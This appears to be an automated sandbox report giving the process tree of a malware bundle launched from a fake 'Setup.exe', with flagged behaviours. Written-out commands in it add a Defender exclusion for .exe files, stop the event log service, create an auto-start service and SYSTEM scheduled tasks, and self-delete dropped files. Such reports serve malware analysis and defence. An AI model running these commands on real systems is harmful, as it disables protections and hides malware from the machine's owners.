PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 2748 wrote to memory of 3068	2748	NhcUArWVz9h91TfdrLuqi3dN.exe	122
PID 2748 wrote to memory of 3068	2748	NhcUArWVz9h91TfdrLuqi3dN.exe	122
PID 2748 wrote to memory of 3068	2748	NhcUArWVz9h91TfdrLuqi3dN.exe	122
PID 552 wrote to memory of 1712	552	wxNBuIU21ycpmjWnNfmKrUQ6.exe	121
PID 552 wrote to memory of 1712	552	wxNBuIU21ycpmjWnNfmKrUQ6.exe	121
PID 552 wrote to memory of 1712	552	wxNBuIU21ycpmjWnNfmKrUQ6.exe	121
PID 2748 wrote to memory of 1660	2748	NhcUArWVz9h91TfdrLuqi3dN.exe	123
PID 2748 wrote to memory of 1660	2748	NhcUArWVz9h91TfdrLuqi3dN.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\archive.zip
1⤵
PID:4224

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4648

C:\Users\Admin\Desktop\archive\Setup.exe
"C:\Users\Admin\Desktop\archive\Setup.exe"
1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4604
- C:\Users\Admin\Documents\SimpleAdobe\nPAPquOt6RNvYOK4CQLeUD7_.exe
  C:\Users\Admin\Documents\SimpleAdobe\nPAPquOt6RNvYOK4CQLeUD7_.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2692
- C:\Users\Admin\Documents\SimpleAdobe\DSxvm0Qozb19cuFXWz0Me_M2.exe
  C:\Users\Admin\Documents\SimpleAdobe\DSxvm0Qozb19cuFXWz0Me_M2.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2204
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3780
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:100
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:732
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:464
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3576
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1680
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2260
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3272
- C:\Users\Admin\Documents\SimpleAdobe\5cTehe6gNdKe1Sv9i06NPlhi.exe
  C:\Users\Admin\Documents\SimpleAdobe\5cTehe6gNdKe1Sv9i06NPlhi.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Users\Admin\AppData\Local\Temp\7zSC9B4.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4248
  - - C:\Users\Admin\AppData\Local\Temp\7zSD58B.tmp\Install.exe
      .\Install.exe /LOAdidLLNEO "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:4088
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4176
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5108
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4600
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 00:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD58B.tmp\Install.exe\" Ij /Vgbedido 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:3336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1072
        5⤵
        Program crash
        
        PID:5492
- C:\Users\Admin\Documents\SimpleAdobe\NhcUArWVz9h91TfdrLuqi3dN.exe
  C:\Users\Admin\Documents\SimpleAdobe\NhcUArWVz9h91TfdrLuqi3dN.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3068
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1660
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:808
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GDGHIDBKJEGI" & exit
      4⤵
      PID:2548
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:5300
- C:\Users\Admin\Documents\SimpleAdobe\wViHNmY1iKyifosq0zeVytNC.exe
  C:\Users\Admin\Documents\SimpleAdobe\wViHNmY1iKyifosq0zeVytNC.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Users\Admin\AppData\Local\Temp\is-IB932.tmp\wViHNmY1iKyifosq0zeVytNC.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-IB932.tmp\wViHNmY1iKyifosq0zeVytNC.tmp" /SL5="$203F4,5245090,54272,C:\Users\Admin\Documents\SimpleAdobe\wViHNmY1iKyifosq0zeVytNC.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:2980
  - - C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe
      "C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4600
  - - C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe
      "C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4816
- C:\Users\Admin\Documents\SimpleAdobe\qeHytovv8jeMkSTeroPzDfGu.exe
  C:\Users\Admin\Documents\SimpleAdobe\qeHytovv8jeMkSTeroPzDfGu.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JDHIEBFHCA.exe"
    3⤵
    PID:4420
  - - C:\Users\Admin\AppData\Local\Temp\JDHIEBFHCA.exe
      "C:\Users\Admin\AppData\Local\Temp\JDHIEBFHCA.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      PID:2548
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3404
      - C:\Users\Admin\AppData\Local\Temp\1000006001\4750f66173.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\4750f66173.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:1716
      - C:\Users\Admin\AppData\Local\Temp\1000011001\116eae0798.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000011001\116eae0798.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3140
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        7⤵
        
        PID:3144
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:3628
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdc9a59f-cb30-4c1f-9e43-c2bec6fd9f59} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" gpu
        9⤵
        
        PID:3168
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2496 -parentBuildID 20240401114208 -prefsHandle 2472 -prefMapHandle 2468 -prefsLen 26673 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fae963a6-94e5-4c7d-8d90-dec925e3b31a} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" socket
        9⤵
        Checks processor information in registry
        
        PID:3876
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1280 -childID 1 -isForBrowser -prefsHandle 2520 -prefMapHandle 1276 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfbd7a76-f17e-4543-84e0-58abcc8db8d8} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" tab
        9⤵
        
        PID:3100
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3708 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e122a91-f673-4519-9719-987d953e07d4} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" tab
        9⤵
        
        PID:5140
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4580 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4492 -prefMapHandle 2916 -prefsLen 31163 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {238f9d1d-7f29-4afb-8a3a-63a0fee7e30d} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" utility
        9⤵
        Checks processor information in registry
        
        PID:5880
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5616 -childID 3 -isForBrowser -prefsHandle 5608 -prefMapHandle 5604 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89061808-d3de-4c68-885e-108d8ff01c43} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" tab
        9⤵
        
        PID:5860
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 4 -isForBrowser -prefsHandle 5808 -prefMapHandle 5804 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7faf2ea-5db2-4ea1-84ee-8f80f65dd69a} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" tab
        9⤵
        
        PID:5872
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6008 -childID 5 -isForBrowser -prefsHandle 6000 -prefMapHandle 5996 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e7c89e-29e6-4277-9f64-bf864f79946f} 3628 "\\.\pipe\gecko-crash-server-pipe.3628" tab
        9⤵
        
        PID:5892
      - C:\Users\Admin\AppData\Local\Temp\1000006001\03613e22b6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\03613e22b6.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:4976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000006001\03613e22b6.exe" & del "C:\ProgramData\*.dll"" & exit
        7⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:4172
      - C:\Users\Admin\AppData\Local\Temp\1000011001\8f3c6cbb8c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000011001\8f3c6cbb8c.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:808
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        7⤵
        
        PID:5688
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:5716
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2100 -parentBuildID 20240401114208 -prefsHandle 2016 -prefMapHandle 2008 -prefsLen 28022 -prefMapSize 245446 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1ec0165-28fb-4a44-bc50-ff1bae8b8de1} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" gpu
        9⤵
        
        PID:4484
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2528 -parentBuildID 20240401114208 -prefsHandle 2504 -prefMapHandle 2500 -prefsLen 28942 -prefMapSize 245446 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e143bdb-6003-4d2a-bc74-a3b84639148e} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" socket
        9⤵
        
        PID:3360
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2980 -childID 1 -isForBrowser -prefsHandle 3448 -prefMapHandle 1612 -prefsLen 25898 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f798c9a5-777c-4953-b639-f6c0cc71afd5} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:5764
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -childID 2 -isForBrowser -prefsHandle 4036 -prefMapHandle 4032 -prefsLen 33385 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94d7ebdb-5363-4145-9767-b2f5c95b8093} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:5436
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4512 -childID 3 -isForBrowser -prefsHandle 4504 -prefMapHandle 4500 -prefsLen 30194 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b942b946-cd52-49da-b2ad-a43558c666ec} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:4412
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5020 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4440 -prefMapHandle 4064 -prefsLen 33607 -prefMapSize 245446 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fd89061-f4f0-4e94-b65f-36c9a9db93fc} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" utility
        9⤵
        Checks processor information in registry
        
        PID:4132
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 4 -isForBrowser -prefsHandle 5392 -prefMapHandle 5712 -prefsLen 30301 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b45cda82-49e5-4228-b20d-e080b6a2ddd4} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:4296
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5636 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5624 -prefsLen 30301 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9931cba2-af12-4987-a93d-3843003865ec} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:60
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5248 -childID 6 -isForBrowser -prefsHandle 5176 -prefMapHandle 5412 -prefsLen 30301 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6921e428-2139-46a4-9b25-77fe0d6671f0} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:3060
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4564 -childID 7 -isForBrowser -prefsHandle 4508 -prefMapHandle 4532 -prefsLen 30301 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d165b3e2-5811-4226-b331-34eff24ba6a5} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:2872
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6424 -childID 8 -isForBrowser -prefsHandle 6348 -prefMapHandle 6344 -prefsLen 30301 -prefMapSize 245446 -jsInitHandle 1136 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3aa96d63-0b00-4513-b037-90e7fbf71cea} 5716 "\\.\pipe\gecko-crash-server-pipe.5716" tab
        9⤵
        
        PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KJKKJKEHDB.exe"
    3⤵
    PID:3100
  - - C:\Users\Admin\AppData\Local\Temp\KJKKJKEHDB.exe
      "C:\Users\Admin\AppData\Local\Temp\KJKKJKEHDB.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      PID:2320
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2160
- C:\Users\Admin\Documents\SimpleAdobe\5uGv7oVshZ8yAWH01j33e301.exe
  C:\Users\Admin\Documents\SimpleAdobe\5uGv7oVshZ8yAWH01j33e301.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Users\Admin\AppData\Local\Temp\7zSC8BA.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:720
  - - C:\Users\Admin\AppData\Local\Temp\7zSD1E1.tmp\Install.exe
      .\Install.exe /wdcUdidEsSsd "385132" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:1060
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:100
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "beIeSqxTUIgkrqSZzo" /SC once /ST 00:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD1E1.tmp\Install.exe\" tg /TvzdidUmNn 385132 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:3124
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1412
        5⤵
        Program crash
        
        PID:452
- C:\Users\Admin\Documents\SimpleAdobe\wxNBuIU21ycpmjWnNfmKrUQ6.exe
  C:\Users\Admin\Documents\SimpleAdobe\wxNBuIU21ycpmjWnNfmKrUQ6.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:552
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:2904
  - - C:\ProgramData\BKJJEBKKEH.exe
      "C:\ProgramData\BKJJEBKKEH.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:2872
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:4256
  - - C:\ProgramData\CBAKJEHDBG.exe
      "C:\ProgramData\CBAKJEHDBG.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:2420
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3932
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CBFBKFIDHIDG" & exit
      4⤵
      PID:5532
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:5608
- C:\Users\Admin\Documents\SimpleAdobe\so48OhzPv9BhRSeWdcEKIXOJ.exe
  C:\Users\Admin\Documents\SimpleAdobe\so48OhzPv9BhRSeWdcEKIXOJ.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4376
- C:\Users\Admin\Documents\SimpleAdobe\9_9Ow6z5UDUvojxA7gJiny39.exe
  C:\Users\Admin\Documents\SimpleAdobe\9_9Ow6z5UDUvojxA7gJiny39.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3616
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:732
- C:\Users\Admin\Documents\SimpleAdobe\CIRkadtqPM_Xa4VYR1LxfMY4.exe
  C:\Users\Admin\Documents\SimpleAdobe\CIRkadtqPM_Xa4VYR1LxfMY4.exe
  2⤵
  - Executes dropped EXE
